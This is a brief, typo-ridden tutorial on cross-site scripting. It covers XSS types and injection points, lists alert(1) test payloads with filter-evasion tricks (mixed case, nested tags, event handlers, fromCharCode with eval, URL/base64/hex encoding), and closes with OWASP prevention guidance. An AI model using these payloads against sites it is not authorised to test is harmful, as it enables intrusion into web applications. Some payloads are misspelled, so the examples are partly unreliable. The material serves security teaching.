# Ultimate guide XSS 

It relies on developers using javascript ot enhance the experience of end-users of their applications.

It's can be inside a redirect o sometimes it will be load in the database and execute every time. 

## Types of XSS 

> Most commons 

* Reflected 
* Persistent 
* Dom-based XSS 


## Attack 

Find possible injection points is to see if reflection happens somewhere .

* Example 
  * search bars 
  * Comments 

A good first step is to inject a bunch of random characters to see if some are blacklisted this includes characters like  ` < > / ; ! $ # ` and combinations to see if they are all reflected properly. 

### Basic injections 

Most Basic : `<scritp>alert(1)</script>`

If it returns a pop up ! you found a goldmine 

This works also in ids `broken_site/xss/1?id=<script>alert(1)</script>)`

If we get some reflection, we can try doing: 

* Capitalization : `>id=<sCriPt>alert(1)</ScRipt>` 
  * Mix lower with upper 
* Wrapping : `id=<sc<script>ript>alert(1)</sc</script>ript>` 
* Injecting a basic tag : `id=<a onmouseover="alert(1)"\>Click me!</a>`
* Converting to ascii code : `?id=<a onmouseover="eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41))"\>Click me!</a>`

To test you can use [Broken cristals](https://github.com/NeuraLegion/broken_crystals/)

## Crazy with payloads 

* Url econdign : `<script>alert(1)</script> to %3Cscript%3Ealert%281%29%3C%2Fscript%3E` 
* Base 64: ` <script>alert(1)</script> to PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==`
* Hexadecimal encoding without semicolon : `<script>alert(1)</script> to %3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E`

## Poliglots 

Are used to save time when testing for XSS, usuarlly cover a large variety of injections contexts 

* [0xsboky](https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot)
* [s0md3v](https://twitter.com/s0md3v/status/966175714302144514)

## Preventions 

Reflected and stored cna be sanitized on the server-side and there are multiple ways of doing it 

* Security encoding lib 
* Blacklisting characters 
* Escape atribute , Escape all non-alphanumerica characters to prevent switching out of the atribute 

[OWASP XSS prevention](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)

## DOM XSS 

Can't be sanitized on the server-side sicne all execution happens on the clinet side and thus the sanitizaton is a bit different 

```
Always HTML escape and then JavaScript escape any parameter or user data input before inserting it into the HTML subcontext in the execution context.

When inserting into the HTML attribute subcontext in the execution context do JavaScript escape before it.
```
Avoid including any volatile data (any parameter/user input) in event handlers and JavaScript code subcontexts in an execution context.

[OWASP DOM XSS Prevention](https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html)

https://brightsec.com/nexploit-neuralegion/
